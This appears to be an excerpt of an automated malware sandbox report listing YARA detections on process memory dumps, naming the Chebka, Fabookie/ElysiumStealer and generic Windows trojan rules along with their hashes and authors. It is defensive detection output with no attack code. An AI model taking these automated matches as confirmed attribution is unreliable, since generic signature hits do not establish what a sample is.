        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.424592109.00000244FE303000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
